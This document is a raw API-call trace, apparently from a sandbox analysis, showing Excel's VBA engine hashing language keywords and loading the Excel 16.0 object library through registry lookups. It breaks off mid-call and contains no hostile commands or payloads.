LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DoEvents") returned 0x109634 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 0x10fe75 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0155.164] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0155.165] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0155.166] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0155.167] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0155.168] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0155.169] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0155.170] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0155.171] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0155.171] StringFromGUID2 (in: rguid=0x787f100*(Data1=0x20813, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x1cf980, cchMax=39 | out: lpsz="{00020813-0000-0000-C000-000000000046}") returned 39 [0155.171] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x1cf640 | out: phkResult=0x1cf640*=0xe5e) returned 0x0 [0155.172] RegOpenKeyW (in: hKey=0xe5e, lpSubKey="{00020813-0000-0000-C000-000000000046}", phkResult=0x1cf638 | out: phkResult=0x1cf638*=0xd7a) returned 0x0 [0155.172] RegEnumKeyW (in: hKey=0xd7a, dwIndex=0x0, lpName=0x1cf668, cchName=0xa | out: lpName="1.9") returned 0x0 [0155.173] wcscpy_s (in: _Destination=0x1cf650, _SizeInWords=0xa, _Source="1.9" | out: _Destination="1.9") returned 0x0 [0155.173] RegOpenKeyW (in: hKey=0xd7a, lpSubKey="1.9", phkResult=0x1cf6f8 | out: phkResult=0x1cf6f8*=0xcd2) returned 0x0 [0155.174] _ultoa_s (in: _Val=0x409, _DstBuf=0x1cf670, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0155.174] RegOpenKeyA (in: hKey=0xcd2, lpSubKey="409", phkResult=0x1cf660 | out: phkResult=0x1cf660*=0x0) returned 0x2 [0155.174] _ultoa_s (in: _Val=0x9, _DstBuf=0x1cf670, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0155.174] RegOpenKeyA (in: hKey=0xcd2, lpSubKey="9", phkResult=0x1cf660 | out: phkResult=0x1cf660*=0x0) returned 0x2 [0155.175] RegOpenKeyA (in: hKey=0xcd2, lpSubKey="0", phkResult=0x1cf660 | out: phkResult=0x1cf660*=0xf76) returned 0x0 [0155.175] RegOpenKeyW (in: hKey=0xf76, lpSubKey="win64", phkResult=0x1cf668 | out: phkResult=0x1cf668*=0xf86) returned 0x0 [0155.177] RegCloseKey (hKey=0xf86) returned 0x0 [0155.177] RegCloseKey (hKey=0xf76) returned 0x0 [0155.177] _ultow_s (in: _Value=0x0, _Buffer=0x1cf700, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0155.177] RegOpenKeyW (in: hKey=0xcd2, lpSubKey="0", phkResult=0x1cf6d8 | out: phkResult=0x1cf6d8*=0xcb6) returned 0x0 [0155.177] RegQueryValueW (in: hKey=0xcb6, lpSubKey="win64", lpData=0x1cf720, lpcbData=0x1cf6d4 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE", lpcbData=0x1cf6d4) returned 0x0 [0155.178] wcscpy_s (in: _Destination=0x1cfa50, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE") returned 0x0 [0155.178] RegCloseKey (hKey=0xcb6) returned 0x0 [0155.179] RegCloseKey (hKey=0xcd2) returned 0x0 [0155.179] RegCloseKey (hKey=0xd7a) returned 0x0 [0155.179] RegCloseKey (hKey=0xe5e) returned 0x0 [0155.179] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE", pptlib=0x1cf6d8*=0x0 | out: pptlib=0x1cf6d8*=0x9ab4b50) returned 0x0 [0155.294] ITypeLib:RemoteGetDocumentation (in: This=0x9ab4b50, index=-1, refPtrFlags=0x1cf6f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xc50c7d8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xc50c7d8) returned 0x0 [0155.294] IUnknown:QueryInterface (in: This=0x9ab4b50, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1cf4e8 | out: ppvObject=0x1cf4e8*=0x0) returned 0x80004002 [0155.294] ITypeLib:RemoteGetLibAttr (in: This=0x9ab4b50, ppTLibAttr=0x1cf4e0, pDummy=0x10 | out: ppTLibAttr=0x1cf4e0, pDummy=0x10) returned 0x0 [0155.294] ITypeLib:RemoteGetDocumentation (in: This=0x9ab4b50, index=-1, refPtrFlags=0x0, pbstrName=0x1cf4d8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x9a50110 | out: pbstrName=0x1cf4d8*="Microsoft Excel 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x9a50110) returned 0x0 [0155.295] StringFromGUID2 (in: rguid=0x523c3b0*(Data1=0x20813, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x1cf500, cchMax=39 | out: lpsz="{00020813-0000-0000-C000-000000000046}") returned 39 [0155.295] _ultow_s (in: _Value=0x1, _Buffer=0x1cf44a, _BufferCount=0x10, _Radix=16 | out: _Buffer="1") returned 0x0 [0155.295] _ultow_s (in: _Value=0x9, _Buffer=0x1cf44e, _BufferCount=0xe, _Radix=16 | out: _Buffer="9") returned 0x0 [0155.295] _ultow_s (in: _Value=0x0, _Buffer=0x1cf452, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0155.295] wcscpy_s (in: _Destination=0x7f554e8, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0155.295] wcscpy_s (in: _Destination=0x7f554ee, _SizeInWords=0x8b, _Source="{00020813-0000-0000-C000-000000000046}" | out: _Destination="{00020813-0000-0000-C000-000000000046}") returned 0x0 [0155.295] wcscpy_s (in: _Destination=0x7f5553a, _SizeInWords=0x65, _Source="#1.9#0#" | out: _Destination="#1.9#0#") returned 0x0 [0155.295] wcscpy_s (in: _Destination=0x7f55548, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE") returned 0x0 [0155.295] wcscpy_s (in: _Destination=0x7f555bc, _SizeInWords=0x24, _Source="Microsoft Excel 16.0 Object Library" | out: _Destination="Microsoft Excel 16.0 Object Library") returned 0x0 [0155.295] ITypeLib:LocalReleaseTLibAttr (This=0x9ab4b50) returned 0x0 [0155.295] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9c8ffd0, cb=0x1a0) returned 0x9a6e910 [0155.295] wcscpy_s (in: _Destination=0x9a6e910, _SizeInWords=0x8e, _Source="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library" | out: _Destination="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library") returned 0x0 [0155.295] ITypeLib:RemoteGetDocumentation (in: This=0x9ab4b50, index=-1, refPtrFlags=0x1cf5f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x5 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x5) returned 0x0 [0155.296] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Excel") returned 0x102b80 [0155.296] strcpy_s (in: _Dst=0x1cf3f0, _DstSize=0x6, _Src="Excel" | out: _Dst="Excel") returned 0x0 [0155.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1cf3f0, cbMultiByte=6, lpWideCharStr=0x1cf240, cchWideChar=6 | out: lpWideCharStr="Excel") returned 6 [0155.296] wcsncpy_s (in: _Destination=0x1cf1f0, _SizeInWords=0x108, _Source="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library") returned 0x0 [0155.296] CharLowerBuffW (in: lpsz="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020813-0000-0000-c000-000000000046}#1.9#0#c:\\program files\\microsoft office\\root\\office16\\excel.exe#microsoft excel 16.0 object library") returned 0x8d [0155.296] IMalloc:Alloc (This=0x7fefecb5380, cb=0x11c) returned 0x9806000 [0155.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020813-0000-0000-c000-000000000046}#1.9#0#c:\\program files\\microsoft office\\root\\office16\\excel.exe#microsoft excel 16.0 object library", cchWideChar=142, lpMultiByteStr=0x9806000, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020813-0000-0000-c000-000000000046}#1.9#0#c:\\program files\\microsoft office\\root\\office16\\excel.exe#microsoft excel 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0155.296] IMalloc:Free (This=0x7fefecb5380, pv=0x9806000) [0155.296] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9950580, cb=0x220) returned 0x9b2fbb0 [0155.296] wcscpy_s (in: _Destination=0x9b2fc58, _SizeInWords=0x8e, _Source="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library" | out: _Destination="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library") returned 0x0 [0155.296] wcsncpy_s (in: 